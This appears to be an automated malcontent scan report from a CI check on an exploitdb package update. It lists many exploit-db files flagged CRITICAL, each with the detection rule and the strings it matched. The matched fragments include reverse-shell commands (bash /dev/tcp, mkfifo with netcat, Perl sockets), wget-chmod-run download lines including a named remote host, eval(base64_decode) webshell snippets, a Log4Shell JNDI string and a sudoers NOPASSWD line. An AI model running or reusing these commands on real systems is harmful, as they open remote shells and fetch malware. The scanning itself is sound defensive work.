exploitdb/2025.03.20 package update #47498
Closed
Octo STS / ci-mal-report (STAGING)
completed
Mar 20, 2025 in 51s
malcontent scan complete
malcontent scan complete
Details
❌ x86_64/exploitdb-2025.03.20-r0.apk
usr/share/app/exploitdb/exploits/asp/webapps/20035.js (CRITICAL)
- Detects payload generated by exe2hex
- echo r cx >>
- echo 4d 5a
usr/share/app/exploitdb/exploits/aspx/webapps/47010.py (CRITICAL)
- Detects CobaltStrike C2 host artifacts
- #Host:
usr/share/app/exploitdb/exploits/aspx/webapps/47011.py (CRITICAL)
- Detects CobaltStrike C2 host artifacts
- #Host:
usr/share/app/exploitdb/exploits/aspx/webapps/47014.py (CRITICAL)
- Detects CobaltStrike C2 host artifacts
- #Host:
usr/share/app/exploitdb/exploits/bsd/dos/869.c (CRITICAL)
- Semi-Auto-generated - file sql.php.php.txt
usr/share/app/exploitdb/exploits/bsd/local/1087.c (CRITICAL)
- Semi-Auto-generated - file sql.php.php.txt
usr/share/app/exploitdb/exploits/cgi/remote/34777.rb (CRITICAL)
- Detects a group of strings often used in exploit codes
- Exploit
- Payload
- CVE-201
usr/share/app/exploitdb/exploits/cgi/remote/37426.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/cgi/webapps/1508.pl (CRITICAL)
- Semi-Auto-generated - file sql.php.php.txt
usr/share/app/exploitdb/exploits/cgi/webapps/35383.rb (CRITICAL)
- executes base64 encoded shell commands
- base64 --decode|sh
usr/share/app/exploitdb/exploits/cgi/webapps/35384.rb (CRITICAL)
- executes base64 encoded shell commands
- base64 --decode|sh
usr/share/app/exploitdb/exploits/cgi/webapps/40462.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/remote/39568.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/remote/40619.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/remote/42726.py (CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/hardware/remote/42888.sh (CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/hardware/remote/43609.py (CRITICAL)
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- directly evaluates base64 content
- base64_decode
- preg_replace
- explode
- exec(
- eval
- Executes code from a remote source
- base64_decode($_SERVER
- eval(base64_decode
usr/share/app/exploitdb/exploits/hardware/remote/44253.py (CRITICAL)
- fetches, chmods, and runs a program
- wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a
usr/share/app/exploitdb/exploits/hardware/remote/44635.py (CRITICAL)
- Installs socket library using pip
- pip install websocket
usr/share/app/exploitdb/exploits/hardware/remote/47888.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/remote/50856.py (CRITICAL)
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/hardware/remote/51677.py (CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/hardware/remote/51852.py (CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/hardware/remote/51853.py (CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/hardware/webapps/36202.py (CRITICAL)
- Executes code from a remote source
- system($_POST
usr/share/app/exploitdb/exploits/hardware/webapps/40284.txt (CRITICAL)
- PHP webshell which eval()s obfuscated string
- preg_replace("/{FILE_PATH}/", '/e
- Exploit
- pack
usr/share/app/exploitdb/exploits/hardware/webapps/42785.sh (CRITICAL)
- PHP code that references hash-bangs and remotely supplied content
- #!/bin/
- $_GET
usr/share/app/exploitdb/exploits/hardware/webapps/45602.py (CRITICAL)
- PHP webshell obfuscated
- shell_exec("
- system('
- \x3
usr/share/app/exploitdb/exploits/hardware/webapps/47627.py (CRITICAL)
- Executes encoded character content
- exec(chr(0)[0
usr/share/app/exploitdb/exploits/hardware/webapps/48835.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/webapps/49110.py (CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/hardware/webapps/49436.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/webapps/49499.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/java/remote/50592.py (CRITICAL)
- Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228
- ${jndi:ldap:/
usr/share/app/exploitdb/exploits/java/webapps/43114.py (CRITICAL)
- JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.
- Runtime.getRuntime().exec(request.getParameter(
- <%@
- %>
- Looks for a common design pattern in webshells where a request attribute is passed directly to exec().
- Runtime.getRuntime().exec(request.
usr/share/app/exploitdb/exploits/java/webapps/46453.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/java/webapps/47895.py (CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/java/webapps/50178.sh (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/jsp/webapps/16274.pl (CRITICAL)
- JSP uploader which gets input, writes files and contains "upload"
- FileOutputStream
- getInputStream
- request
- UPLOAD
- <%
- %>
usr/share/app/exploitdb/exploits/jsp/webapps/17924.pl (CRITICAL)
- JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.
- Runtime.getRuntime().exec(request.getParameter(
- <%@
- %>
- Web Shell - file cmd.jsp
- out.println("Command: " + request.getParameter("cmd") + "
");
- out.println("Command: " + request.getParameter("cmd") + "
- Looks for a common design pattern in webshells where a request attribute is passed directly to exec().
- Runtime.getRuntime().exec(request.
usr/share/app/exploitdb/exploits/jsp/webapps/46967.py (CRITICAL)
- Strings from the ver.jsp webshell
- out.print((char)c);}in.close()
usr/share/app/exploitdb/exploits/jsp/webapps/47180.rb (CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/jsp/webapps/51991.py (CRITICAL)
- JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.
- Runtime.getRuntime().exec(request.getParameter(
- <%
- %>
- Looks for a common design pattern in webshells where a request attribute is passed directly to exec().
- Runtime.getRuntime().exec(request.
usr/share/app/exploitdb/exploits/linux/dos/44264.c (CRITICAL)
- Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)
-
<reflection
-
usr/share/app/exploitdb/exploits/linux/local/14814.c (CRITICAL)
- Detects Linux Exploit Perl (Linux.Exploit.Perl)
- seeking out the sma
usr/share/app/exploitdb/exploits/linux/local/203.sh (CRITICAL)
- persists via a hidden crontab entry
-
-
-
-
-
- /tmp/.rootcron
-
-
-
-
- crontab
-
usr/share/app/exploitdb/exploits/linux/local/21258.bat (CRITICAL)
- Standard AV test, checking for an EICAR substring
- $EICAR-STANDARD-ANTIVIRUS-TEST-FILE!
usr/share/app/exploitdb/exploits/linux/local/25444.c (CRITICAL)
- Detects Linux Exploit Intfour (Linux.Exploit.Intfour)
- m(code, 1024, &needle
usr/share/app/exploitdb/exploits/linux/local/35161.c (CRITICAL)
- Sample from CN Honker Pentest Toolset - file mempodipper2.6.39
- objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed
usr/share/app/exploitdb/exploits/linux/local/39702.rb (CRITICAL)
- Detects a group of strings often used in exploit codes
- Exploit
- Payload
- CVE-201
usr/share/app/exploitdb/exploits/linux/local/40679.sh (CRITICAL)
- Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group
- rm -f /etc/ld.so.preload
usr/share/app/exploitdb/exploits/linux/local/40688.rb (CRITICAL)
- Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group
- rm -f /etc/ld.so.preload
usr/share/app/exploitdb/exploits/linux/local/40759.rb (CRITICAL)
- Detects Linux Exploit Cve 2016 4557 (Linux.Exploit.CVE-2016-4557)
- . if this worked, yo
usr/share/app/exploitdb/exploits/linux/local/40768.sh (CRITICAL)
- Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group
- rm -f /etc/ld.so.preload
usr/share/app/exploitdb/exploits/linux/local/40774.sh (CRITICAL)
- Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group
- rm -f /etc/ld.so.preload
usr/share/app/exploitdb/exploits/linux/local/40810.c (CRITICAL)
- Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)
- ve: Linux 2.6.
usr/share/app/exploitdb/exploits/linux/local/40921.sh (CRITICAL)
- Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group
- rm -f /etc/ld.so.preload
usr/share/app/exploitdb/exploits/linux/local/40938.py (CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/linux/local/41994.c (CRITICAL)
- Detects Linux Exploit Cve 2017 100011 (Linux.Exploit.CVE-2017-100011)
- ] done, kernel text:
usr/share/app/exploitdb/exploits/linux/local/43418.c (CRITICAL)
- Detects Linux Exploit Cve 2017 100011 (Linux.Exploit.CVE-2017-100011)
- ] done, kernel text:
usr/share/app/exploitdb/exploits/linux/local/47168.c (CRITICAL)
- Detects Linux Exploit Cve 2017 100011 (Linux.Exploit.CVE-2017-100011)
- ] done, kernel text:
usr/share/app/exploitdb/exploits/linux/local/47169.c (CRITICAL)
- Detects Linux Exploit Cve 2017 100011 (Linux.Exploit.CVE-2017-100011)
- ] done, kernel text:
usr/share/app/exploitdb/exploits/linux/local/50808.c (CRITICAL)
- Detects Linux Exploit Cve 2022 0847 (Linux.Exploit.CVE-2022-0847)
- hijacking suid binary
- Usage: %s SUID
- splice failed
- prepare_pipe
- short splice
- short write
usr/share/app/exploitdb/exploits/linux/local/50911.py (CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- '>&
usr/share/app/exploitdb/exploits/linux/local/51934.sh (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/1247.pl (CRITICAL)
- Semi-Auto-generated - file sql.php.php.txt
usr/share/app/exploitdb/exploits/linux/remote/1258.php (CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
$path[strlen($ - "upload"
- exploit
- Exploit
- bypass
usr/share/app/exploitdb/exploits/linux/remote/13853.pl (CRITICAL)
- fetches, chmods, and runs a program
- wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell
- wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot
usr/share/app/exploitdb/exploits/linux/remote/15725.pl (CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/linux/remote/16311.rb (CRITICAL)
- Detects Linux Exploit Perl (Linux.Exploit.Perl)
- Tue Sep 21 16:48:12
usr/share/app/exploitdb/exploits/linux/remote/25970.py (CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/linux/remote/34595.py (CRITICAL)
- Detects indicators often found in linux malware samples. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness.
- |base64 -
- whoami
- /tmp
usr/share/app/exploitdb/exploits/linux/remote/348.c (CRITICAL)
- Detects Linux Exploit Perl (Linux.Exploit.Perl)
- Tue Sep 21 16:48:12
usr/share/app/exploitdb/exploits/linux/remote/34860.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/34900.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/35581.rb (CRITICAL)
- References a 'backd00r'
- backd00r HTTP
usr/share/app/exploitdb/exploits/linux/remote/36933.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/37262.rb (CRITICAL)
- Executes code from a remote source
- passthru($_GET
usr/share/app/exploitdb/exploits/linux/remote/40232.py (CRITICAL)
- executes base64 encoded shell commands
- base64 -d | sh
usr/share/app/exploitdb/exploits/linux/remote/41785.rb (CRITICAL)
- executes base64 encoded shell commands
- base64 -d|sh
usr/share/app/exploitdb/exploits/linux/remote/42957.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/42958.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/44297.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/44571.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/45914.rb (CRITICAL)
- executes base64 encoded shell commands
- base64 -d|bash
usr/share/app/exploitdb/exploits/linux/remote/47039.rb (CRITICAL)
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/linux/remote/47358.py (CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/linux/remote/48170.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/48353.rb (CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- exploit
- Exploit
- bypass
- Bypass
- eval(
- ase6
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
- Executes code from a remote source
- eval(base64_decode
usr/share/app/exploitdb/exploits/linux/remote/50347.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/5224.php (CRITICAL)
- php webshell containing base64 encoded payload
- base64_decode
- V4ZWN1
- ZXhlY3
- ZXZhb
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- References multiple PHP functions in base64 form
- base64_php_functions_multiple::base64_decode
- base64_php_functions_multiple::Zm9yZWFja
- base64_php_functions_multiple::ZvcmVhY2
- base64_php_functions_multiple::dW5saW5r
- base64_php_functions_multiple::N0cmxlb
- base64_php_functions_multiple::<?php
- base64_php_functions_multiple::ZXhlY
- base64_php_functions_multiple::V4ZW
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
- Executes code from a remote source
- base64_decode($_SERVER
- eval(base64_decode
usr/share/app/exploitdb/exploits/linux/webapps/18932.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
- PHP webshell which eval()s obfuscated string
- base64_decode
- shell_exec(b
- Exploit
- hardcoded /dev/tcp host:port
- /dev/tcp/172.16.164.1/1234
- Executes code from a remote source
- shell_exec(base64_decode
usr/share/app/exploitdb/exploits/linux/webapps/20064.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
- PHP webshell which eval()s obfuscated string
- base64_decode
- shell_exec(b
- Exploit
- Executes code from a remote source
- shell_exec(base64_decode
usr/share/app/exploitdb/exploits/linux/webapps/41628.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/webapps/41976.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/webapps/42149.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/webapps/42187.py (CRITICAL)
- Decodes and evaluates code
- base64_decode
- preg_replace
- explode
- exec(
- eval
usr/share/app/exploitdb/exploits/linux/webapps/45542.py (CRITICAL)
- executes base64 encoded shell commands
- base64 -d | bash
usr/share/app/exploitdb/exploits/linux/webapps/45852.py (CRITICAL)
- JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.
- Runtime.getRuntime().exec(request.getParameter(
- <%@
- %>
- Looks for a common design pattern in webshells where a request attribute is passed directly to exec().
- Runtime.getRuntime().exec(request.
usr/share/app/exploitdb/exploits/linux/webapps/46221.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/linux/webapps/48519.py (CRITICAL)
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/linux/webapps/49735.py (CRITICAL)
- Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp
- sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
- osw = new BufferedWriter(new OutputStreamWriter(os));
- isr = new BufferedReader(new InputStreamReader(is));
usr/share/app/exploitdb/exploits/linux/webapps/50144.py (CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/linux/webapps/50234.py (CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/linux/webapps/50809.py (CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/linux/webapps/51797.py (CRITICAL)
- References shell script within /dev/shm (world writeable)
- /dev/shm/exec.sh
usr/share/app/exploitdb/exploits/linux_x86-64/local/33589.c (CRITICAL)
- Detects Linux Exploit Intfour (Linux.Exploit.Intfour)
- m(code, 1024, &needle
usr/share/app/exploitdb/exploits/linux_x86/dos/36741.py (CRITICAL)
- Identifies Impacket, a collection of Python classes for working with network protocols.
- impacket.dcerpc
- impacket.nmb
usr/share/app/exploitdb/exploits/macos/local/45782.c (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/dos/4856.php (CRITICAL)
- Performs DDoS (distributed denial of service) attacks
- TSource Engine Query
usr/share/app/exploitdb/exploits/multiple/dos/5679.php (CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- exploit
- eval(
- ase6
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- PHP webshell which eval()s obfuscated string
- base64_decode
- exploit
- eval(b
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
- Executes code from a remote source
- eval(base64_decode
usr/share/app/exploitdb/exploits/multiple/local/46727.rb (CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/local/49491.py (CRITICAL)
- executes base64 encoded shell commands
- base64 -d | sh
usr/share/app/exploitdb/exploits/multiple/remote/10.c (CRITICAL)
- Equation Group hack tool leaked by ShadowBrokers- file sambal
-
- connecting back to: [%d.%d.%d.%d:45295]
-
- Exploit failed, try -b to bruteforce.
- Usage: %s [-bBcCdfprsStv] [host]
-
- Host is not running samba!
-
- Bruteforce mode.
-
usr/share/app/exploitdb/exploits/multiple/remote/18245.py (CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/multiple/remote/19420.c (CRITICAL)
- Equation Group hack tool leaked by ShadowBrokers- file cmsd
- usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]
- port=%d connected!
- xxx.XXXXXX
usr/share/app/exploitdb/exploits/multiple/remote/21080.rb (CRITICAL)
- JSP uploader which gets input, writes files and contains "upload"
- FileOutputStream
- getParameter
- request
- upload
- Upload
- <%@p
- %>
usr/share/app/exploitdb/exploits/multiple/remote/21339.c (CRITICAL)
- Standard AV test, checking for an EICAR substring
- $EICAR-STANDARD-ANTIVIRUS-TEST-FILE!
usr/share/app/exploitdb/exploits/multiple/remote/35441.rb (CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
- Detects indicators often found in linux malware samples. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness.
- && chmod +x
- |base64 -
- /tmp
usr/share/app/exploitdb/exploits/multiple/remote/40824.py (CRITICAL)
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/multiple/remote/46628.rb (CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/remote/46814.rb (CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/remote/47698.rb (CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/remote/48338.rb (CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/remote/48508.rb (CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/remote/49067.py (CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/multiple/remote/50932.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/webapps/41685.rb (CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/multiple/webapps/41688.rb (CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- backdoor
- exploit
- Exploit
- hacker
- eval(
- ase6
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
- Executes code from a remote source
- eval(base64_decode
usr/share/app/exploitdb/exploits/multiple/webapps/42884.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/webapps/46773.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/webapps/47364.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/webapps/47901.sh (CRITICAL)
- Detects payloads used in Shitrix exploitation CVE-2019-19781
- tee /netscaler/portal/templates/
- template.new({'BLOCK'%3d
- pwnpzi1337
- NSC_NONCE:
- NSC_USER:
- /../
usr/share/app/exploitdb/exploits/multiple/webapps/47902.py (CRITICAL)
- Detects payloads used in Shitrix exploitation CVE-2019-19781
- template.new({'BLOCK'='print readpipe(
- /../
usr/share/app/exploitdb/exploits/multiple/webapps/47913.rb (CRITICAL)
- Detects payloads used in Shitrix exploitation CVE-2019-19781
- template.new({'BLOCK'='print readpipe(
- /../
usr/share/app/exploitdb/exploits/multiple/webapps/48804.py (CRITICAL)
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/multiple/webapps/49571.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/webapps/49885.py (CRITICAL)
- Find .csv file exploiting DDE technique
- =cmd|
usr/share/app/exploitdb/exploits/multiple/webapps/50230.py (CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/multiple/webapps/50233.py (CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/multiple/webapps/51452.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/nodejs/webapps/49552.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/osx/local/27965.py (CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/osx/local/38371.py (CRITICAL)
- No description has been set in the source file - BinaryAlert
- ALL ALL=(ALL) NOPASSWD: ALL
-
-
-
-
-
- root echo
-
-
-
-
- /etc/sudoers
- /etc/crontab
- /usr/bin/rsh
- localhost
usr/share/app/exploitdb/exploits/osx/local/38540.rb (CRITICAL)
- No description has been set in the source file - BinaryAlert
- ALL ALL=(ALL) NOPASSWD: ALL
-
-
-
-
-
- root echo
-
-
-
-
- /etc/crontab
- /etc/sudoers
- /usr/bin/rsh
- localhost
usr/share/app/exploitdb/exploits/php/dos/10243.py (CRITICAL)
- Executes code from a remote source
- eval($_REQUEST
usr/share/app/exploitdb/exploits/php/dos/1345.php (CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
$path[strlen($ - str_replace
- exploit
- Exploit
usr/share/app/exploitdb/exploits/php/dos/1573.php (CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
$path[strlen($ - str_replace
- exploit
- Exploit
- ++;$
usr/share/app/exploitdb/exploits/php/local/32901.php (CRITICAL)
- php webshell containing base64 encoded payload
- base64_decode
- leGVj
- References multiple PHP functions in base64 form
- base64_php_functions_multiple::Y3VybF9zZXRvcH
- base64_php_functions_multiple::base64_decode
- base64_php_functions_multiple::Y3VybF9leGVj
- base64_php_functions_multiple::ZXhwbG9kZ
- base64_php_functions_multiple::VtcHR5
- base64_php_functions_multiple::ZW1wdH
- base64_php_functions_multiple::<?php
- base64_php_functions_multiple::leGVj
usr/share/app/exploitdb/exploits/php/remote/18898.rb (CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/23006.rb (CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/24444.rb (CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/25137.rb (CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/26622.rb (CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/27941.rb (CRITICAL)
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/29325.rb (CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
$functionName ($ - exploit
- Exploit
- shell_
usr/share/app/exploitdb/exploits/php/remote/30928.php (CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
$Target[strlen($ - exploit
- Exploit
usr/share/app/exploitdb/exploits/php/remote/32439.rb (CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/34160.py (CRITICAL)
- Executes code from a remote source
- passthru($_GET
usr/share/app/exploitdb/exploits/php/remote/34191.py (CRITICAL)
- Executes code from a remote source
- passthru($_GET
usr/share/app/exploitdb/exploits/php/remote/34390.rb (CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/35183.rb (CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/35283.rb (CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/35545.rb (CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/36264.rb (CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- unlink(FILE)
- exploit
- Exploit
- eval(
- ase6
- PHP webshell which directly eval()s obfuscated string
- e
Loading